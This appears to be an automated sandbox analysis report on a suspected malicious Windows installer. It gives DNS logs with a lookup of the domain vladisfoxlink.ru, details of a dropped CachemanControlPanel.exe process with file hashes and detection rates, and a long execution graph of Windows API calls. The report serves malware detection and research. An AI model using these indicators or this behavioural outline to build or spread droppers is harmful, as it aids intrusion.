                                                      Apr 26, 2021 11:50:04.726411104 CEST53518188.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:05.267373085 CEST5662853192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:05.319027901 CEST53566288.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:06.146003962 CEST6077853192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:06.203610897 CEST53607788.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:08.035721064 CEST5379953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:08.101006031 CEST53537998.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:08.587802887 CEST5468353192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:08.648570061 CEST53546838.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:16.483350992 CEST5932953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:16.532052040 CEST53593298.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:17.239250898 CEST6402153192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:17.310776949 CEST53640218.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:18.794290066 CEST5612953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:18.853596926 CEST53561298.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:19.879628897 CEST5817753192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:19.938446999 CEST53581778.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:48.570847034 CEST5070053192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:48.629894972 CEST53507008.8.8.8192.168.2.6
                                                      Apr 26, 2021 11:50:51.346134901 CEST5406953192.168.2.68.8.8.8
                                                      Apr 26, 2021 11:50:51.394746065 CEST53540698.8.8.8192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Apr 26, 2021 11:50:17.239250898 CEST192.168.2.68.8.8.80x296cStandard query (0)vladisfoxlink.ruA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Apr 26, 2021 11:49:08.093974113 CEST8.8.8.8192.168.2.60x965cNo error (0)api.globalsign.cloud104.18.24.243A (IP address)IN (0x0001)
                                                      Apr 26, 2021 11:49:08.093974113 CEST8.8.8.8192.168.2.60x965cNo error (0)api.globalsign.cloud104.18.25.243A (IP address)IN (0x0001)
                                                      Apr 26, 2021 11:50:17.310776949 CEST8.8.8.8192.168.2.60x296cNo error (0)vladisfoxlink.ru45.85.90.225A (IP address)IN (0x0001)

                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:11:49:15
                                                      Start date:26/04/2021
                                                      Path:C:\Users\user\Desktop\dY5HmgsBm6.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\dY5HmgsBm6.exe'
                                                      Imagebase:0x400000
                                                      File size:2573987 bytes
                                                      MD5 hash:AE8F9D9B8344D52F0872DFDC852E1DD4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low

                                                      General

                                                      Start time:11:49:16
                                                      Start date:26/04/2021
                                                      Path:C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\CachemanControlPanel\CachemanControlPanel.exe
                                                      Imagebase:0x400000
                                                      File size:3345920 bytes
                                                      MD5 hash:5D3BF7A18887582B8A2CEA327F2E7BA6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 6%, Metadefender, Browse
                                                      • Detection: 14%, ReversingLabs
                                                      Reputation:low

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:19.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16.7%
                                                        Total number of Nodes:1316
                                                        Total number of Limit Nodes:19

                                                        Graph

                                                        execution_graph 3569 401d44 3573 402bac 3569->3573 3571 401d52 SetWindowLongA 3572 402a5a 3571->3572 3574 40618a 17 API calls 3573->3574 3575 402bc1 3574->3575 3575->3571 3576 401ec5 3577 402bac 17 API calls 3576->3577 3578 401ecb 3577->3578 3579 402bac 17 API calls 3578->3579 3580 401ed7 3579->3580 3581 401ee3 ShowWindow 3580->3581 3582 401eee EnableWindow 3580->3582 3583 402a5a 3581->3583 3582->3583 3584 401746 3585 402bce 17 API calls 3584->3585 3586 40174d 3585->3586 3587 405cbf 2 API calls 3586->3587 3588 401754 3587->3588 3588->3588 3589 4045c6 3590 4045d6 3589->3590 3591 4045fc 3589->3591 3592 40417b 18 API calls 3590->3592 3593 4041e2 8 API calls 3591->3593 3594 4045e3 SetDlgItemTextA 3592->3594 3595 404608 3593->3595 3594->3591 3596 401947 3597 402bce 17 API calls 3596->3597 3598 40194e lstrlenA 3597->3598 3599 402620 3598->3599 3143 403348 SetErrorMode GetVersion 3144 403389 3143->3144 3145 40338f 3143->3145 3146 406500 5 API calls 3144->3146 3233 406492 GetSystemDirectoryA 3145->3233 3146->3145 3148 4033a5 lstrlenA 3148->3145 3149 4033b4 3148->3149 3236 406500 GetModuleHandleA 3149->3236 3152 406500 5 API calls 3153 4033c2 3152->3153 3154 406500 5 API calls 3153->3154 3155 4033ce #17 OleInitialize SHGetFileInfoA 3154->3155 3242 4060f7 lstrcpynA 3155->3242 3158 40341a GetCommandLineA 3243 4060f7 lstrcpynA 3158->3243 3160 40342c 3161 405aba CharNextA 3160->3161 3162 403455 CharNextA 3161->3162 3172 403465 3162->3172 3163 40352f 3164 403542 GetTempPathA 3163->3164 3244 403317 3164->3244 3166 40355a 3167 4035b4 DeleteFileA 3166->3167 3168 40355e GetWindowsDirectoryA lstrcatA 3166->3168 3254 402ea1 GetTickCount GetModuleFileNameA 3167->3254 3170 403317 12 API calls 3168->3170 3169 405aba CharNextA 3169->3172 3173 40357a 3170->3173 3172->3163 3172->3169 3174 403531 3172->3174 3173->3167 3176 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3173->3176 3338 4060f7 lstrcpynA 3174->3338 3175 4035c8 3177 403662 ExitProcess OleUninitialize 3175->3177 3180 40364e 3175->3180 3187 405aba CharNextA 3175->3187 3179 403317 12 API calls 3176->3179 3181 403796 3177->3181 3182 403678 3177->3182 3185 4035ac 3179->3185 3282 40390a 3180->3282 3183 403818 ExitProcess 3181->3183 3184 40379e GetCurrentProcess OpenProcessToken 3181->3184 3341 405813 3182->3341 3189 4037e9 3184->3189 3190 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3184->3190 3185->3167 3185->3177 3192 4035e3 3187->3192 3195 406500 5 API calls 3189->3195 3190->3189 3191 40365e 3191->3177 3196 403629 3192->3196 3197 40368e 3192->3197 3198 4037f0 3195->3198 3200 405b7d 18 API calls 3196->3200 3345 40577e 3197->3345 3201 403805 ExitWindowsEx 3198->3201 3204 403811 3198->3204 3203 403634 3200->3203 3201->3183 3201->3204 3203->3177 3339 4060f7 lstrcpynA 3203->3339 3207 40140b 2 API calls 3204->3207 3205 4036a4 lstrcatA 3206 4036af lstrcatA lstrcmpiA 3205->3206 3206->3177 3208 4036cb 3206->3208 3207->3183 3210 4036d0 3208->3210 3211 4036d7 3208->3211 3348 4056e4 CreateDirectoryA 3210->3348 3353 405761 CreateDirectoryA 3211->3353 3212 403643 3340 4060f7 lstrcpynA 3212->3340 3217 4036dc SetCurrentDirectoryA 3218 4036f6 3217->3218 3219 4036eb 3217->3219 3357 4060f7 lstrcpynA 3218->3357 3356 4060f7 lstrcpynA 3219->3356 3222 40618a 17 API calls 3223 403735 DeleteFileA 3222->3223 3224 403742 CopyFileA 3223->3224 3230 403704 3223->3230 3224->3230 3225 40378a 3227 405ed6 36 API calls 3225->3227 3226 405ed6 36 API calls 3226->3230 3228 403791 3227->3228 3228->3177 3229 40618a 17 API calls 3229->3230 3230->3222 3230->3225 3230->3226 3230->3229 3232 403776 CloseHandle 3230->3232 3358 405796 CreateProcessA 3230->3358 3232->3230 3234 4064b4 wsprintfA LoadLibraryExA 3233->3234 3234->3148 3237 406526 GetProcAddress 3236->3237 3238 40651c 3236->3238 3240 4033bb 3237->3240 3239 406492 3 API calls 3238->3239 3241 406522 3239->3241 3240->3152 3241->3237 3241->3240 3242->3158 3243->3160 3245 4063d2 5 API calls 3244->3245 3247 403323 3245->3247 3246 40332d 3246->3166 3247->3246 3248 405a8f 3 API calls 3247->3248 3249 403335 3248->3249 3250 405761 2 API calls 3249->3250 3251 40333b 3250->3251 3361 405cbf 3251->3361 3365 405c90 GetFileAttributesA CreateFileA 3254->3365 3256 402ee1 3276 402ef1 3256->3276 3366 4060f7 lstrcpynA 3256->3366 3258 402f07 3259 405ad6 2 API calls 3258->3259 3260 402f0d 3259->3260 3367 4060f7 lstrcpynA 3260->3367 3262 402f18 GetFileSize 3263 403012 3262->3263 3281 402f2f 3262->3281 3368 402e3d 3263->3368 3265 40301b 3267 40304b GlobalAlloc 3265->3267 3265->3276 3403 403300 SetFilePointer 3265->3403 3379 403300 SetFilePointer 3267->3379 3269 40307e 3273 402e3d 6 API calls 3269->3273 3271 403034 3274 4032ea ReadFile 3271->3274 3272 403066 3380 4030d8 3272->3380 3273->3276 3277 40303f 3274->3277 3276->3175 3277->3267 3277->3276 3278 402e3d 6 API calls 3278->3281 3279 403072 3279->3276 3279->3279 3280 4030af SetFilePointer 3279->3280 3280->3276 3281->3263 3281->3269 3281->3276 3281->3278 3400 4032ea 3281->3400 3283 406500 5 API calls 3282->3283 3284 40391e 3283->3284 3285 403924 3284->3285 3286 403936 3284->3286 3424 406055 wsprintfA 3285->3424 3287 405fde 3 API calls 3286->3287 3288 403961 3287->3288 3289 40397f lstrcatA 3288->3289 3292 405fde 3 API calls 3288->3292 3291 403934 3289->3291 3409 403bcf 3291->3409 3292->3289 3295 405b7d 18 API calls 3296 4039b1 3295->3296 3297 403a3a 3296->3297 3299 405fde 3 API calls 3296->3299 3298 405b7d 18 API calls 3297->3298 3301 403a40 3298->3301 3302 4039dd 3299->3302 3300 403a50 LoadImageA 3304 403af6 3300->3304 3305 403a77 RegisterClassA 3300->3305 3301->3300 3303 40618a 17 API calls 3301->3303 3302->3297 3306 4039f9 lstrlenA 3302->3306 3309 405aba CharNextA 3302->3309 3303->3300 3308 40140b 2 API calls 3304->3308 3307 403aad SystemParametersInfoA CreateWindowExA 3305->3307 3337 403b00 3305->3337 3310 403a07 lstrcmpiA 3306->3310 3311 403a2d 3306->3311 3307->3304 3312 403afc 3308->3312 3313 4039f7 3309->3313 3310->3311 3314 403a17 GetFileAttributesA 3310->3314 3315 405a8f 3 API calls 3311->3315 3317 403bcf 18 API calls 3312->3317 3312->3337 3313->3306 3316 403a23 3314->3316 3318 403a33 3315->3318 3316->3311 3319 405ad6 2 API calls 3316->3319 3320 403b0d 3317->3320 3425 4060f7 lstrcpynA 3318->3425 3319->3311 3322 403b19 ShowWindow 3320->3322 3323 403b9c 3320->3323 3325 406492 3 API calls 3322->3325 3417 4052f0 OleInitialize 3323->3417 3327 403b31 3325->3327 3326 403ba2 3329 403ba6 3326->3329 3330 403bbe 3326->3330 3328 403b3f GetClassInfoA 3327->3328 3331 406492 3 API calls 3327->3331 3333 403b53 GetClassInfoA RegisterClassA 3328->3333 3334 403b69 DialogBoxParamA 3328->3334 3336 40140b 2 API calls 3329->3336 3329->3337 3332 40140b 2 API calls 3330->3332 3331->3328 3332->3337 3333->3334 3335 40140b 2 API calls 3334->3335 3335->3337 3336->3337 3337->3191 3338->3164 3339->3212 3340->3180 3342 405828 3341->3342 3343 403686 ExitProcess 3342->3343 3344 40583c MessageBoxIndirectA 3342->3344 3344->3343 3346 406500 5 API calls 3345->3346 3347 403693 lstrcatA 3346->3347 3347->3205 3347->3206 3349 405735 GetLastError 3348->3349 3350 4036d5 3348->3350 3349->3350 3351 405744 SetFileSecurityA 3349->3351 3350->3217 3351->3350 3352 40575a GetLastError 3351->3352 3352->3350 3354 405771 3353->3354 3355 405775 GetLastError 3353->3355 3354->3217 3355->3354 3356->3218 3357->3230 3359 4057d5 3358->3359 3360 4057c9 CloseHandle 3358->3360 3359->3230 3360->3359 3362 405cca GetTickCount GetTempFileNameA 3361->3362 3363 403346 3362->3363 3364 405cf7 3362->3364 3363->3166 3364->3362 3364->3363 3365->3256 3366->3258 3367->3262 3369 402e46 3368->3369 3370 402e5e 3368->3370 3371 402e56 3369->3371 3372 402e4f DestroyWindow 3369->3372 3373 402e66 3370->3373 3374 402e6e GetTickCount 3370->3374 3371->3265 3372->3371 3404 40653c 3373->3404 3376 402e7c CreateDialogParamA ShowWindow 3374->3376 3377 402e9f 3374->3377 3376->3377 3377->3265 3379->3272 3381 4030ee 3380->3381 3382 40311c 3381->3382 3408 403300 SetFilePointer 3381->3408 3384 4032ea ReadFile 3382->3384 3385 403127 3384->3385 3386 403283 3385->3386 3387 403139 GetTickCount 3385->3387 3394 40326d 3385->3394 3388 4032c5 3386->3388 3393 403287 3386->3393 3387->3394 3399 403188 3387->3399 3390 4032ea ReadFile 3388->3390 3389 4032ea ReadFile 3389->3399 3390->3394 3391 4032ea ReadFile 3391->3393 3392 405d37 WriteFile 3392->3393 3393->3391 3393->3392 3393->3394 3394->3279 3395 4031de GetTickCount 3395->3399 3396 403203 MulDiv wsprintfA 3397 40521e 24 API calls 3396->3397 3397->3399 3398 405d37 WriteFile 3398->3399 3399->3389 3399->3394 3399->3395 3399->3396 3399->3398 3401 405d08 ReadFile 3400->3401 3402 4032fd 3401->3402 3402->3281 3403->3271 3405 406559 PeekMessageA 3404->3405 3406 402e6c 3405->3406 3407 40654f DispatchMessageA 3405->3407 3406->3265 3407->3405 3408->3382 3410 403be3 3409->3410 3426 406055 wsprintfA 3410->3426 3412 403c54 3413 403c88 18 API calls 3412->3413 3415 403c59 3413->3415 3414 40398f 3414->3295 3415->3414 3416 40618a 17 API calls 3415->3416 3416->3415 3418 4041c7 SendMessageA 3417->3418 3421 405313 3418->3421 3419 4041c7 SendMessageA 3420 40534c OleUninitialize 3419->3420 3420->3326 3422 401389 2 API calls 3421->3422 3423 40533a 3421->3423 3422->3421 3423->3419 3424->3291 3425->3297 3426->3412 3600 4038c8 3601 4038d3 3600->3601 3602 4038d7 3601->3602 3603 4038da GlobalAlloc 3601->3603 3603->3602 3607 401fcb 3608 402bce 17 API calls 3607->3608 3609 401fd2 3608->3609 3610 40646b 2 API calls 3609->3610 3611 401fd8 3610->3611 3613 401fea 3611->3613 3614 406055 wsprintfA 3611->3614 3614->3613 3615 4014d6 3616 402bac 17 API calls 3615->3616 3617 4014dc Sleep 3616->3617 3619 402a5a 3617->3619 3427 401759 3466 402bce 3427->3466 3429 401760 3430 401786 3429->3430 3431 40177e 3429->3431 3474 4060f7 lstrcpynA 3430->3474 3473 4060f7 lstrcpynA 3431->3473 3434 401791 3436 405a8f 3 API calls 3434->3436 3435 401784 3438 4063d2 5 API calls 3435->3438 3437 401797 lstrcatA 3436->3437 3437->3435 3443 4017a3 3438->3443 3439 4017ae 3440 40646b 2 API calls 3439->3440 3439->3443 3444 4017ba CompareFileTime 3439->3444 3440->3439 3441 405c6b 2 API calls 3441->3443 3443->3439 3443->3441 3445 40187e 3443->3445 3452 40618a 17 API calls 3443->3452 3458 4060f7 lstrcpynA 3443->3458 3463 405813 MessageBoxIndirectA 3443->3463 3464 401855 3443->3464 3472 405c90 GetFileAttributesA CreateFileA 3443->3472 3444->3439 3446 40521e 24 API calls 3445->3446 3448 401888 3446->3448 3447 40521e 24 API calls 3455 40186a 3447->3455 3449 4030d8 31 API calls 3448->3449 3450 40189b 3449->3450 3451 4018af SetFileTime 3450->3451 3453 4018c1 FindCloseChangeNotification 3450->3453 3451->3453 3452->3443 3454 4018d2 3453->3454 3453->3455 3456 4018d7 3454->3456 3457 4018ea 3454->3457 3459 40618a 17 API calls 3456->3459 3460 40618a 17 API calls 3457->3460 3458->3443 3461 4018df lstrcatA 3459->3461 3462 4018f2 3460->3462 3461->3462 3465 405813 MessageBoxIndirectA 3462->3465 3463->3443 3464->3447 3464->3455 3465->3455 3467 402bda 3466->3467 3468 40618a 17 API calls 3467->3468 3469 402bfb 3468->3469 3470 402c07 3469->3470 3471 4063d2 5 API calls 3469->3471 3470->3429 3471->3470 3472->3443 3473->3435 3474->3434 3620 401959 3621 402bac 17 API calls 3620->3621 3622 401960 3621->3622 3623 402bac 17 API calls 3622->3623 3624 40196d 3623->3624 3625 402bce 17 API calls 3624->3625 3626 401984 lstrlenA 3625->3626 3628 401994 3626->3628 3627 4019d4 3628->3627 3632 4060f7 lstrcpynA 3628->3632 3630 4019c4 3630->3627 3631 4019c9 lstrlenA 3630->3631 3631->3627 3632->3630 3520 40535c 3521 405507 3520->3521 3522 40537e GetDlgItem GetDlgItem GetDlgItem 3520->3522 3524 40550f GetDlgItem CreateThread FindCloseChangeNotification 3521->3524 3527 405537 3521->3527 3565 4041b0 SendMessageA 3522->3565 3524->3527 3568 4052f0 5 API calls 3524->3568 3525 4053ee 3534 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3525->3534 3526 405565 3530 4055c0 3526->3530 3531 405575 3526->3531 3532 405599 ShowWindow 3526->3532 3527->3526 3528 405586 3527->3528 3529 40554d ShowWindow ShowWindow 3527->3529 3533 4041e2 8 API calls 3528->3533 3567 4041b0 SendMessageA 3529->3567 3530->3528 3542 4055cd SendMessageA 3530->3542 3536 404154 SendMessageA 3531->3536 3538 4055b9 3532->3538 3539 4055ab 3532->3539 3537 405592 3533->3537 3540 405463 3534->3540 3541 405447 SendMessageA SendMessageA 3534->3541 3536->3528 3544 404154 SendMessageA 3538->3544 3543 40521e 24 API calls 3539->3543 3545 405476 3540->3545 3546 405468 SendMessageA 3540->3546 3541->3540 3542->3537 3547 4055e6 CreatePopupMenu 3542->3547 3543->3538 3544->3530 3549 40417b 18 API calls 3545->3549 3546->3545 3548 40618a 17 API calls 3547->3548 3551 4055f6 AppendMenuA 3548->3551 3550 405486 3549->3550 3554 4054c3 GetDlgItem SendMessageA 3550->3554 3555 40548f ShowWindow 3550->3555 3552 405614 GetWindowRect 3551->3552 3553 405627 TrackPopupMenu 3551->3553 3552->3553 3553->3537 3556 405643 3553->3556 3554->3537 3559 4054ea SendMessageA SendMessageA 3554->3559 3557 4054b2 3555->3557 3558 4054a5 ShowWindow 3555->3558 3560 405662 SendMessageA 3556->3560 3566 4041b0 SendMessageA 3557->3566 3558->3557 3559->3537 3560->3560 3561 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3560->3561 3563 4056a1 SendMessageA 3561->3563 3563->3563 3564 4056c3 GlobalUnlock SetClipboardData CloseClipboard 3563->3564 3564->3537 3565->3525 3566->3554 3567->3526 3633 40275d 3634 402763 3633->3634 3635 402a5a 3634->3635 3636 40276b FindClose 3634->3636 3636->3635 3637 40495e 3638 40498a 3637->3638 3639 40496e 3637->3639 3641 404990 SHGetPathFromIDListA 3638->3641 3642 4049bd 3638->3642 3648 4057f7 GetDlgItemTextA 3639->3648 3644 4049a0 3641->3644 3645 4049a7 SendMessageA 3641->3645 3643 40497b SendMessageA 3643->3638 3646 40140b 2 API calls 3644->3646 3645->3642 3646->3645 3648->3643 3649 401a5e 3650 402bac 17 API calls 3649->3650 3651 401a67 3650->3651 3652 402bac 17 API calls 3651->3652 3653 401a0e 3652->3653 3654 4029de 3655 406500 5 API calls 3654->3655 3656 4029e5 3655->3656 3657 402bce 17 API calls 3656->3657 3658 4029ee 3657->3658 3659 402a2a 3658->3659 3664 40614a 3658->3664 3661 4029fc 3661->3659 3668 406134 3661->3668 3665 406155 3664->3665 3666 406178 IIDFromString 3665->3666 3667 406171 3665->3667 3666->3661 3667->3661 3671 406119 WideCharToMultiByte 3668->3671 3670 402a1d CoTaskMemFree 3670->3659 3671->3670 3672 4027df 3673 402bce 17 API calls 3672->3673 3675 4027ed 3673->3675 3674 402803 3676 405c6b 2 API calls 3674->3676 3675->3674 3677 402bce 17 API calls 3675->3677 3678 402809 3676->3678 3677->3674 3700 405c90 GetFileAttributesA CreateFileA 3678->3700 3680 402816 3681 402822 GlobalAlloc 3680->3681 3682 4028bf 3680->3682 3683 4028b6 CloseHandle 3681->3683 3684 40283b 3681->3684 3685 4028c7 DeleteFileA 3682->3685 3686 4028da 3682->3686 3683->3682 3701 403300 SetFilePointer 3684->3701 3685->3686 3688 402841 3689 4032ea ReadFile 3688->3689 3690 40284a GlobalAlloc 3689->3690 3691 402894 3690->3691 3692 40285a 3690->3692 3693 405d37 WriteFile 3691->3693 3694 4030d8 31 API calls 3692->3694 3695 4028a0 GlobalFree 3693->3695 3699 402867 3694->3699 3696 4030d8 31 API calls 3695->3696 3698 4028b3 3696->3698 3697 40288b GlobalFree 3697->3691 3698->3683 3699->3697 3700->3680 3701->3688 3702 4023e0 3703 402bce 17 API calls 3702->3703 3704 4023f1 3703->3704 3705 402bce 17 API calls 3704->3705 3706 4023fa 3705->3706 3707 402bce 17 API calls 3706->3707 3708 402404 GetPrivateProfileStringA 3707->3708 3709 4028e0 3710 402bac 17 API calls 3709->3710 3711 4028e6 3710->3711 3712 402925 3711->3712 3713 40290e 3711->3713 3718 4027bf 3711->3718 3715 40293f 3712->3715 3716 40292f 3712->3716 3714 402913 3713->3714 3719 402922 3713->3719 3723 4060f7 lstrcpynA 3714->3723 3717 40618a 17 API calls 3715->3717 3720 402bac 17 API calls 3716->3720 3717->3719 3719->3718 3724 406055 wsprintfA 3719->3724 3720->3719 3723->3718 3724->3718 3725 401b63 3726 402bce 17 API calls 3725->3726 3727 401b6a 3726->3727 3728 402bac 17 API calls 3727->3728 3729 401b73 wsprintfA 3728->3729 3730 402a5a 3729->3730 3731 401d65 3732 401d78 GetDlgItem 3731->3732 3733 401d6b 3731->3733 3735 401d72 3732->3735 3734 402bac 17 API calls 3733->3734 3734->3735 3736 401db9 GetClientRect LoadImageA SendMessageA 3735->3736 3737 402bce 17 API calls 3735->3737 3739 401e1a 3736->3739 3741 401e26 3736->3741 3737->3736 3740 401e1f DeleteObject 3739->3740 3739->3741 3740->3741 3742 4042e6 3743 4042fc 3742->3743 3750 404408 3742->3750 3747 40417b 18 API calls 3743->3747 3744 404477 3745 404541 3744->3745 3746 404481 GetDlgItem 3744->3746 3752 4041e2 8 API calls 3745->3752 3748 404497 3746->3748 3749 4044ff 3746->3749 3751 404352 3747->3751 3748->3749 3756 4044bd SendMessageA LoadCursorA SetCursor 3748->3756 3749->3745 3757 404511 3749->3757 3750->3744 3750->3745 3753 40444c GetDlgItem SendMessageA 3750->3753 3754 40417b 18 API calls 3751->3754 3766 40453c 3752->3766 3775 40419d KiUserCallbackDispatcher 3753->3775 3755 40435f CheckDlgButton 3754->3755 3773 40419d KiUserCallbackDispatcher 3755->3773 3779 40458a 3756->3779 3761 404517 SendMessageA 3757->3761 3762 404528 3757->3762 3761->3762 3762->3766 3767 40452e SendMessageA 3762->3767 3763 404472 3776 404566 3763->3776 3764 40437d GetDlgItem 3774 4041b0 SendMessageA 3764->3774 3767->3766 3770 404393 SendMessageA 3771 4043b1 GetSysColor 3770->3771 3772 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3770->3772 3771->3772 3772->3766 3773->3764 3774->3770 3775->3763 3777 404574 3776->3777 3778 404579 SendMessageA 3776->3778 3777->3778 3778->3744 3782 4057d9 ShellExecuteExA 3779->3782 3781 4044f0 LoadCursorA SetCursor 3781->3749 3782->3781 3783 40166a 3784 402bce 17 API calls 3783->3784 3785 401671 3784->3785 3786 402bce 17 API calls 3785->3786 3787 40167a 3786->3787 3788 402bce 17 API calls 3787->3788 3789 401683 MoveFileA 3788->3789 3790 401696 3789->3790 3791 40168f 3789->3791 3792 40646b 2 API calls 3790->3792 3795 4022e2 3790->3795 3793 401423 24 API calls 3791->3793 3794 4016a5 3792->3794 3793->3795 3794->3795 3796 405ed6 36 API calls 3794->3796 3796->3791 3797 40216b 3798 402bce 17 API calls 3797->3798 3799 402172 3798->3799 3800 402bce 17 API calls 3799->3800 3801 40217c 3800->3801 3802 402bce 17 API calls 3801->3802 3803 402186 3802->3803 3804 402bce 17 API calls 3803->3804 3805 402193 3804->3805 3806 402bce 17 API calls 3805->3806 3807 40219d 3806->3807 3808 4021df CoCreateInstance 3807->3808 3809 402bce 17 API calls 3807->3809 3812 4021fe 3808->3812 3814 4022ac 3808->3814 3809->3808 3810 401423 24 API calls 3811 4022e2 3810->3811 3813 40228c MultiByteToWideChar 3812->3813 3812->3814 3813->3814 3814->3810 3814->3811 3815 4022eb 3816 402bce 17 API calls 3815->3816 3817 4022f1 3816->3817 3818 402bce 17 API calls 3817->3818 3819 4022fa 3818->3819 3820 402bce 17 API calls 3819->3820 3821 402303 3820->3821 3822 40646b 2 API calls 3821->3822 3823 40230c 3822->3823 3824 40231d lstrlenA lstrlenA 3823->3824 3829 402310 3823->3829 3826 40521e 24 API calls 3824->3826 3825 40521e 24 API calls 3827 402318 3825->3827 3828 402359 SHFileOperationA 3826->3828 3828->3827 3828->3829 3829->3825 3829->3827 3830 40236d 3831 402374 3830->3831 3835 402387 3830->3835 3832 40618a 17 API calls 3831->3832 3833 402381 3832->3833 3834 405813 MessageBoxIndirectA 3833->3834 3834->3835 3836 40266d 3837 402bac 17 API calls 3836->3837 3838 402677 3837->3838 3839 405d08 ReadFile 3838->3839 3840 4026e7 3838->3840 3842 4026f7 3838->3842 3844 4026e5 3838->3844 3839->3838 3845 406055 wsprintfA 3840->3845 3843 40270d SetFilePointer 3842->3843 3842->3844 3843->3844 3845->3844 3846 4019ed 3847 402bce 17 API calls 3846->3847 3848 4019f4 3847->3848 3849 402bce 17 API calls 3848->3849 3850 4019fd 3849->3850 3851 401a04 lstrcmpiA 3850->3851 3852 401a16 lstrcmpA 3850->3852 3853 401a0a 3851->3853 3852->3853 3854 40296e 3855 402bac 17 API calls 3854->3855 3856 402974 3855->3856 3857 4029af 3856->3857 3859 4027bf 3856->3859 3860 402986 3856->3860 3858 40618a 17 API calls 3857->3858 3857->3859 3858->3859 3860->3859 3862 406055 wsprintfA 3860->3862 3862->3859 3863 4014f4 SetForegroundWindow 3864 402a5a 3863->3864 3865 402476 3866 402bce 17 API calls 3865->3866 3867 402488 3866->3867 3868 402bce 17 API calls 3867->3868 3869 402492 3868->3869 3882 402c5e 3869->3882 3872 402a5a 3873 4024c7 3875 4024d3 3873->3875 3878 402bac 17 API calls 3873->3878 3874 402bce 17 API calls 3877 4024c0 lstrlenA 3874->3877 3876 4024f5 RegSetValueExA 3875->3876 3879 4030d8 31 API calls 3875->3879 3880 40250b RegCloseKey 3876->3880 3877->3873 3878->3875 3879->3876 3880->3872 3883 402c79 3882->3883 3886 405fab 3883->3886 3887 405fba 3886->3887 3888 405fc5 RegCreateKeyExA 3887->3888 3889 4024a2 3887->3889 3888->3889 3889->3872 3889->3873 3889->3874 3890 402777 3891 40277d 3890->3891 3892 402781 FindNextFileA 3891->3892 3894 402793 3891->3894 3893 4027d2 3892->3893 3892->3894 3896 4060f7 lstrcpynA 3893->3896 3896->3894 3897 401ef9 3898 402bce 17 API calls 3897->3898 3899 401eff 3898->3899 3900 402bce 17 API calls 3899->3900 3901 401f08 3900->3901 3902 402bce 17 API calls 3901->3902 3903 401f11 3902->3903 3904 402bce 17 API calls 3903->3904 3905 401f1a 3904->3905 3906 401423 24 API calls 3905->3906 3907 401f21 3906->3907 3914 4057d9 ShellExecuteExA 3907->3914 3909 401f5c 3910 406575 5 API calls 3909->3910 3912 4027bf 3909->3912 3911 401f76 CloseHandle 3910->3911 3911->3912 3914->3909 3475 401f7b 3476 402bce 17 API calls 3475->3476 3477 401f81 3476->3477 3478 40521e 24 API calls 3477->3478 3479 401f8b 3478->3479 3480 405796 2 API calls 3479->3480 3481 401f91 3480->3481 3482 401fb2 CloseHandle 3481->3482 3485 4027bf 3481->3485 3490 406575 WaitForSingleObject 3481->3490 3482->3485 3486 401fa6 3487 401fb4 3486->3487 3488 401fab 3486->3488 3487->3482 3495 406055 wsprintfA 3488->3495 3491 40658f 3490->3491 3492 4065a1 GetExitCodeProcess 3491->3492 3493 40653c 2 API calls 3491->3493 3492->3486 3494 406596 WaitForSingleObject 3493->3494 3494->3491 3495->3482 3915 401ffb 3916 402bce 17 API calls 3915->3916 3917 402002 3916->3917 3918 406500 5 API calls 3917->3918 3919 402011 3918->3919 3920 402029 GlobalAlloc 3919->3920 3921 402091 3919->3921 3920->3921 3922 40203d 3920->3922 3923 406500 5 API calls 3922->3923 3924 402044 3923->3924 3925 406500 5 API calls 3924->3925 3926 40204e 3925->3926 3926->3921 3930 406055 wsprintfA 3926->3930 3928 402085 3931 406055 wsprintfA 3928->3931 3930->3928 3931->3921 3932 4018fd 3933 401934 3932->3933 3934 402bce 17 API calls 3933->3934 3935 401939 3934->3935 3936 4058bf 67 API calls 3935->3936 3937 401942 3936->3937 3938 401000 3939 401037 BeginPaint GetClientRect 3938->3939 3940 40100c DefWindowProcA 3938->3940 3942 4010f3 3939->3942 3945 401179 3940->3945 3943 401073 CreateBrushIndirect FillRect DeleteObject 3942->3943 3944 4010fc 3942->3944 3943->3942 3946 401102 CreateFontIndirectA 3944->3946 3947 401167 EndPaint 3944->3947 3946->3947 3948 401112 6 API calls 3946->3948 3947->3945 3948->3947 3949 401900 